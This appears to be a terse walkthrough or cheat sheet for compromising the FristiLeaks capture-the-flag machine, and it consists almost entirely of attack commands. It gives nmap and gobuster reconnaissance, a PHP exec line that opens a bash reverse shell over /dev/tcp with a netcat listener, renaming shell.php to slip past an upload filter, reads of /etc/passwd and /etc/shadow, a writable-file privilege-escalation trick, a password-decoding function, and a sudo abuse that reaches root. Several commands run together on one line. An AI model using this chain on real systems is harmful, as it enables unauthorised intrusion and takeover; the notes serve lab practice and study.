1. Network Discovery
nmap -sn
nmap -Pn
nmap -A -p80
nmap --script vuln -p80
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,cgi
exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");
rlwrap nc -lvp 1234
mv shell.php shell.jpg
cp shell.php shell.php.jpg
cat /etc/passwd
ls -la /etc/passwd
ls -la /etc/shadow
cat notes.txt
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthiscd /tmpls -la
cd /home/adminls -la
cat cryptedpass.txtcat whoisyourgodnow.txt
def decodeString(str):
base64string = codecs.decode(str[::-1], 'rot13')
return base64.b64decode(base64string)
su fristigod
sudo -l
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bashwhoami
cd /rootls -lacat fristileaks_secrets.txt

